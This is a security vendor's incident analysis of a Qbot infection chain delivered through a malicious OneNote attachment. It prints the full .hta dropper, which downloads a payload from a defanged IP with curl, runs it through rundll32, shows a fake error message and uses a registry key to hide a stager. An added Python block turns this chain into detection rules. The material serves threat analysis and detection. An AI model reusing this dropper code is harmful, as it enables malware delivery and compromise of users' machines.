Investigating Malicious Use of OneNote to Deploy Qbot
Sean Savold | 2023-02-03 | 5 min read

High-level Summary

  • Todyl’s MXDR (Managed eXtended Detection and Response) teams observed a threat actor utilizing new TTPs to attempt to install Qbot malware after a user downloaded a malicious OneNote file.
  • Todyl’s Endpoint Security (EDR+NGAV) module immediately blocked the attack attempt to prevent further compromise.
  • The MXDR team responded in minutes and Todyl’s detection engineering team is making additional detections based on these observed behaviors to ensure all partners are protected.
  • We recommend immediately blocking OneNote attachments. This activity also highlights the need for ongoing security awareness training, including phishing tests.

Details on Todyl's Investigation

On February 3rd, 2023, Todyl’s MXDR team received alerts about a suspicious file being launched from OneNote. Upon execution, Todyl’s Endpoint Security (EDR + NGAV) module prevented the behavior and all subsequent stages of the attack.

Recognizing the severity, our MXDR and Detection Engineering teams began testing in our lab environment. Running the Endpoint Security module in detect-only mode, we received multiple alerts for malicious activity:

Detection Timeline:

  • Feb 3, 2023 @ 10:19:38 -- Ingress Tool Transfer via CURL
  • Feb 3, 2023 @ 10:19:38 -- Suspicious Windows Script Interpreter Child Process
  • Feb 3, 2023 @ 10:19:38 -- RunDLL32 with Unusual Arguments
  • Feb 3, 2023 @ 10:19:38 -- RunDLL32/Regsvr32 Loads Dropped Executable
  • Feb 3, 2023 @ 10:19:38 -- Windows.Trojan.Qbot
  • Feb 3, 2023 @ 10:19:38 -- Shellcode Injection
  • Feb 3, 2023 @ 10:19:38 -- Suspicious String Value Written to Registry Run Key

Upon opening the OneNote file, the user is instructed to execute an embedded file (Open[.]hta) within the OneNote document:

Within the .hta file, we found this encoded content:

Analyzing further, we were able to identify the .hta file's execution mechanism:

<div
function sleep(millis) {
  var date = new Date()
  var curDate = null
  do {
    curDate = new Date()
  } while (curDate - date < millis)
}
var shell = new ActiveXObject("wscript.shell")
/** var url = "https://google.com"
*/
shell.run("curl.exe --output C:\\ProgramData\\a4aFOd5wh.png --url " + url, 0)
sleep(15000)
var shellap = new ActiveXObject("shell.application")
shellap.shellexecute("rundll32", "C:\\ProgramData\\a4aFOd5wh.png,Wind", "", "open", 3)
shell.Popup("This document is corrupted and could not be opened", 0, "Document Error", 16)
shell.run("taskkill /f /im mshta.exe", 0)
</div>

<script language="javascript">
  var aPpcY2D6 = "5a29503a4909fcade36b1823e7cebcf5";
  var akD8Sy = "HKCU\\SOFTWARE\\cqptlz\\ug9o\\b8kvyy";
  function avlONjF(aD45uK)
  {
    return(document.getElementById(aD45uK).innerText);
  }
</script>

<script language="vbscript">
  Dim a9lAB
  Set a9lAB = CreateObject("wscript.shell")
  a9lAB.RegWrite akD8Sy, avlONjF("ap6oBZEfG"), "REG_SZ"
</script>

<script language="javascript">
  var as4JIGMhX = a9lAB.regread(akD8Sy);
  as4JIGMhX = as4JIGMhX.replace(/100&/g, "");
  if(as4JIGMhX)
    {
      var avE9dmu = new Function("url", as4JIGMhX);
    }
</script>

<script language="vbscript">
  ay8b3d = "hxxp://172[.]96[.]137[.]149/72943[.]dat"
  Call avE9dmu(ay8b3d)
  a9lAB.RegDelete(akD8Sy)
</script>

After the .hta file runs, a curl command retrieves 72943[.]dat from hxxp://172[.]96[.]137[.]149/72943[.]dat:
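As an added example (not code from the original post or from Todyl's tooling), the Python below turns the parent/child and argument patterns behind the detection timeline above (script host spawned by OneNote, curl writing into ProgramData, rundll32 loading a non-DLL) into rules and runs them over constructed, Sysmon-style process-creation events; the field names, the sample events and the placeholder download host 198.51.100.7 are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed; field names are assumed)."""
    parent_image: str
    image: str
    command_line: str

# Constructed sample events modelled on the mshta -> curl -> rundll32 chain above,
# plus two benign look-alikes; the host 198.51.100.7 is a documentation placeholder.
SAMPLE_EVENTS = [
    ProcEvent("onenote.exe", "mshta.exe", r'mshta.exe "C:\Users\alice\AppData\Local\Temp\Open.hta"'),
    ProcEvent("mshta.exe", "curl.exe", r"curl.exe --output C:\ProgramData\a4aFOd5wh.png --url http://198.51.100.7/72943.dat"),
    ProcEvent("mshta.exe", "rundll32.exe", r"rundll32 C:\ProgramData\a4aFOd5wh.png,Wind"),
    ProcEvent("explorer.exe", "curl.exe", r"curl.exe -O https://example.org/report.csv"),
    ProcEvent("svchost.exe", "rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SUSPICIOUS_CHILDREN = {"curl.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe", "cmd.exe"}
NON_CODE_EXT = re.compile(r"\.(png|jpg|gif|dat|txt|pdf)$", re.I)  # extensions a loaded DLL should not carry

def classify(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty list if nothing fires)."""
    hits = []
    parent, image, cl = ev.parent_image.lower(), ev.image.lower(), ev.command_line
    if parent == "onenote.exe" and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if parent in SCRIPT_HOSTS and image in SUSPICIOUS_CHILDREN:
        hits.append("script_host_child_process")
    if image == "curl.exe" and re.search(r"--output\s+\S*programdata\\", cl, re.I):
        hits.append("curl_ingress_tool_transfer")
    if image == "rundll32.exe":
        # The first argument is the module to load, written as "<path>,<export>".
        m = re.search(r'rundll32(?:\.exe)?\s+"?([^",]+)', cl, re.I)
        module = m.group(1) if m else ""
        if NON_CODE_EXT.search(module) or "programdata" in module.lower():
            hits.append("rundll32_loads_non_dll")
    return hits

def scan(events) -> dict:
    """Map each flagged command line to its rule hits; events with no hits are omitted."""
    return {ev.command_line: classify(ev) for ev in events if classify(ev)}

if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules):55} {cmd}")
```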


At the time of writing, VirusTotal reports this IP as clean. There have been reports of additional files with similar activity: